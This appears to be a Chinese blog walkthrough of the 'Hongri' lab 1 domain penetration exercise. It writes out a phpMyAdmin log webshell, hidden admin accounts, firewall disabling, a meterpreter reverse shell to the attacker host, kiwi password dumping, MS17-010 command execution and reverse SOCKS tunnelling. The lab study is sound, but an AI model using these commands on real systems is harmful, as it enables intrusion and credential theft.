红日靶场1

文章目录

  • 红日靶场的渗透思路
  • 一、靶场搭建
    • 网络拓扑
    • 1.win7配置
    • 2,win2003配置
    • 3,server2008配置
    • 4,kali配置
  • 二、渗透流程
    • 一.信息收集
    • 二,获取webshell
      • 1.进入后台之后,可以选择插入一句话木马------失败
      • 2.在日志中插入木马
      • 3.蚁剑链接
    • 三,创建后门
      • 1.创建隐藏用户,并加入管理员权限
      • 2.关闭防火墙
    • 四,内网渗透
      • 1.先使用msfvenom,创建木马程序
      • 2.将木马程序通过蚁剑上传到网站上
      • 3.kali通过msfconsole监听
    • 五,内网信息收集
    • 六,提权
    • 七,获取用户密码
    • 八,横向渗透
      • 1.ms17-010漏洞利用
      • 2.添加后门
      • 3.代理内网
      • 4.也可以尝试开代理,使用rdesktop远程连接


红日靶场的渗透思路

活得久爬得高的坏人,往往不会蠢,这是一件让人很无奈的事情


一、靶场搭建

红日靶场下载

网络拓扑

红日靶场1_第1张图片

下载后解压出三个文件夹,分别对应三台靶机,密码都是`hongrisec@2019`,但只有win7可以进
kali(自带)  攻击机

win7         web服务器       

server08     域控

win2003      域成员

红日靶场1_第2张图片

用VMware,打开文件夹中.vmx文件
kali网卡 ---- -----net模式
server2008-----VMware1
win2003---------VMware1
win7--------------两个网卡

1.win7配置

win7是web服务器,连接着外网和内网,所以需要两个网卡
第一个网卡选择------VMwear1(仅主机模式) 用于内网
第二个网卡选择------net模式 用于外网

红日靶场1_第3张图片
红日靶场1_第4张图片红日靶场1_第5张图片

使用hongrisec@2019登陆后,打开phpstudy中,apache和MySQL服务

红日靶场1_第6张图片

2,win2003配置

红日靶场1_第7张图片

3,server2008配置

红日靶场1_第8张图片

4,kali配置

红日靶场1_第9张图片

二、渗透流程

一.信息收集

C段扫描

红日靶场1_第10张图片

端口扫描

红日靶场1_第11张图片

目录扫描

红日靶场1_第12张图片红日靶场1_第13张图片

扫出三个有效的目录
 /phpmyadmin
 /phpinfo.php
 /l.php

红日靶场1_第14张图片
红日靶场1_第15张图片
红日靶场1_第16张图片

1.从这三个目录中可以得到php的版本5.4.45
2.网站的绝对路径是C:/phpStudy/WWW
3.phpmyadmin是后台,可以尝试弱密码爆破(账号密码都是root

二,获取webshell

1.进入后台之后,可以选择插入一句话木马------失败

红日靶场1_第17张图片

报错提示,要使用into outfile函数,secure_file_priv函数要为ON
且不能被set global修改,只能在my.ini或my.conf配置文件中修改

红日靶场1_第18张图片

红日靶场1_第19张图片

2.在日志中插入木马

查看日志的状态
show variables like ‘%general%’;

红日靶场1_第20张图片

修改日志状态
set global general_log=‘ON’; 执行再次查看日志状态

红日靶场1_第21张图片

成功修改后,将日志转移到网站根目录下
set global general_log_file=‘C:/phpStudy/WWW/lzh.php’;
lzh.php是自己随便命名的

红日靶场1_第22张图片

然后加入一句话木马
select ‘

红日靶场1_第23张图片
红日靶场1_第24张图片

3.蚁剑链接

红日靶场1_第25张图片
红日靶场1_第26张图片

三,创建后门

1.创建隐藏用户,并加入管理员权限

net user lzh$ 123456lzh@ /add     创建隐藏用户
net localgroup administrators lzh$ /add     将用户加入管理员组
net user lzh$ /active:yes           激活用户

红日靶场1_第27张图片

2.关闭防火墙

netsh advfirewall show allprofile state   查看防火墙状态
netsh advfirewall set allprofile state off   关闭防火墙

红日靶场1_第28张图片在这里插入图片描述

whoami查看还是administrator权限

四,内网渗透

1.先使用msfvenom,创建木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=6666 -f exe -o hacker.exe

2.将木马程序通过蚁剑上传到网站上

红日靶场1_第29张图片

3.kali通过msfconsole监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.32.128
set lport 6666
run

红日靶场1_第30张图片

运行hacker.exe

红日靶场1_第31张图片

五,内网信息收集

shell
chcp 65001 修复乱码

红日靶场1_第32张图片

ipconfig /all
显示所有网络适配器
主机名为stu1,内网网段为192.168.52.143

红日靶场1_第33张图片红日靶场1_第34张图片

net user /domain
查看域用户
域内有5个用户

红日靶场1_第35张图片

net group “domain admins” /domain ------查看域管理员

红日靶场1_第36张图片

net config workstation ---------查看当前的域的信息

红日靶场1_第37张图片

net time /domain ----------查找域控

得到域名,通过ping,解析域名的IP地址
192.168.52.138

红日靶场1_第38张图片

net view /domain ---------查看本机的域

红日靶场1_第39张图片

net view ---------查看当前域中计算机的名称

红日靶场1_第40张图片
红日靶场1_第41张图片

经过以上内网信息收集,得到
域内有3台主机,
//OWA, 域控:192.168.52.138
//ROOT-TVI862UBEH,域成员:192.168.52.141
//STU1win7:192.168.52.143
域内有5个用户
Administrator | Guest | krbtgt | ligang | liukaifeng01

六,提权

1| getuid    查看当前权限
2| getsystem   提权
3| getuid    验证提权

红日靶场1_第42张图片

七,获取用户密码

红日靶场1_第43张图片

我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中
1.首先ps查看进程
2.找一个user为system的进程----PID
3.migrate 508
4.load kiwi 加载kiwi模块
5.creds_all 这里密码我自己改过

红日靶场1_第44张图片
红日靶场1_第45张图片

八,横向渗透


> 使用autoroute模块,它的功能是添加去内网路由
> run post/multi/manage/autoroute    查看当前路由信息
> run autoroute -s 192.168.10.0/24        添加路由
> run autoroute -p                    查看路由信息

background相当于存档,使用session -i,可以回到存档时的位置

红日靶场1_第46张图片

路由添加完成之后,就是扫描内网主机的端口
search portscan
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141             添加目标主机的IP地址
set ports 22,445,3389                 添加要扫描的端口,可以更多
run

红日靶场1_第47张图片

1.ms17-010漏洞利用

发现两台主机都开放了,445端口,想到用永恒之蓝试一下

红日靶场1_第48张图片

可以看到两台主机都有永恒之蓝的漏洞
使用模块command

2.添加后门

添加用户
use 2
set rhosts 192.168.52.138
set command net user hacker 123456hack! /add
run

将用户添加到管理员组
set command net localgroup Administrators hacker /add
run

开启远程桌面
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run

红日靶场1_第49张图片

红日靶场1_第50张图片
红日靶场1_第51张图片

3.代理内网

ew(Earthworm)内网穿透工具

git clone https://github.com/idlefire/ew.git

kali

./ew_for_linux64 -s rcsocks -l 5656 -e 9999

红日靶场1_第52张图片meterpreter

ew_for_Win.exe -s rssocks -d 192.168.32.128 -e 9999

在这里插入图片描述
红日靶场1_第53张图片在这里插入图片描述

开全局代理:setg proxies socks5:127.0.0.1:5656

在这里插入图片描述


这里不知道为什么会报错,也查了资料,一无所获,就放弃了,

4.也可以尝试开代理,使用rdesktop远程连接

你可能感兴趣的:(网络,安全,红日)